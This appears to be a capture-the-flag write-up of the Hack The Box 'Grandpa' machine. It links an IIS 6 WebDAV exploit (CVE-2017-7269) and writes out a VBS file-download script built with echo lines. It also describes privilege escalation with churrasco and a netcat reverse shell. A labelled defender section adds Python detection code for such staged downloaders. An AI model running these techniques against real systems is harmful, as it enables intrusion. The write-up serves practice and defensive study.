
Hack the box – Grandpa without Metasploit

After a break, back to OSCP practice boxes, starting with Grandpa. Grandpa is a Windows box with Server 2003 installed.

Let's start with nmap.

After the nmap scan we can see that IIS v6 is installed. Tried gobuster as well, nothing interesting.

Did a davtest to see if it was accessible. No luck on that either.

Tried searching for an exploit using searchsploit. The one found didn't work well.

After googling for some time, got a script which helped to get a limited shell.

https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269

After downloading the script, renamed it to exploit.py since it is a Python script. After executing the script, got a shell.

Next is privilege escalation. For privilege escalation, used churrasco.exe and nc.exe. The netcat exe file comes with Kali, so there is no need to download it, but churrasco you can wget from https://github.com/Re4son/Churrasco/raw/master/churrasco.exe

After downloading the files, it's time to transfer them to the Windows box. I'm going to use a VBS script, which should be familiar to OSCP students. Before that, had to set up a web server using Python: python -m SimpleHTTPServer 80

For the script, you can copy and paste everything as it is into the command prompt.

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

This will create a file called wget.vbs, which can be used to download the rest of the files needed for privilege escalation.

All the files were downloaded using the wget.vbs file. For the privilege escalation we have to run churrasco and nc, and also have to open a new netcat listener.

We got the administrative shell.
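From the defender's side, a script staged one `echo ... >> wget.vbs` line at a time is easy to recognise in a recorded command transcript. The sketch below is an added example, not part of the original post: it rebuilds files staged this way and flags those that look like HTTP downloaders. The transcript lines, trait names and threshold are constructed assumptions, and since `echo` is a cmd.exe built-in that never shows up in process-creation logs, the input is assumed to be a captured shell session.

```python
import ntpath
import re

# cmd.exe lines of the form: echo <text> > file   or   echo <text> >> file
ECHO_REDIRECT = re.compile(
    r'^\s*echo\s+(?P<body>.*?)\s*(?P<op>>>?)\s*(?P<file>[^\s>|&]+)\s*$', re.I)

# Trait names are hypothetical; the strings come from the page's script,
# except "savetofile" (ADODB.Stream), added as a common alternative.
TRAITS = {
    "http_com_object": ("winhttp.winhttprequest", "msxml2.serverxmlhttp",
                        "microsoft.xmlhttp"),
    "reads_response_body": ("responsebody",),
    "writes_file": ("createtextfile", "savetofile"),
    "takes_arguments": ("wscript.arguments",),
}

def rebuild_staged_files(transcript):
    """Reassemble files written line by line with echo redirection."""
    files = {}
    for line in transcript:
        m = ECHO_REDIRECT.match(line)
        if not m:
            continue
        name = ntpath.basename(m["file"]).lower()
        if m["op"] == ">":        # a single '>' truncates, so the file restarts
            files[name] = []
        files.setdefault(name, []).append(m["body"])
    return files

def downloader_traits(script_lines):
    """Return the set of downloader traits present in a rebuilt script."""
    text = "\n".join(script_lines).lower()
    return {t for t, needles in TRAITS.items() if any(n in text for n in needles)}

def triage(transcript, min_traits=3):
    """List staged script files that look like HTTP downloaders."""
    findings = []
    for name, lines in rebuild_staged_files(transcript).items():
        traits = downloader_traits(lines)
        if (name.endswith((".vbs", ".js")) and "http_com_object" in traits
                and len(traits) >= min_traits):
            findings.append((name, len(lines), sorted(traits)))
    return findings

# Constructed transcript: four lines of the page's staging plus a benign redirect.
SAMPLE = [
    'echo strUrl = WScript.Arguments.Item(0) > wget.vbs',
    'echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs',
    'echo varByteArray = http.ResponseBody >> wget.vbs',
    'echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs',
    'echo backup finished >> C:\\logs\\backup.log',
]
```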

Hope this helps.
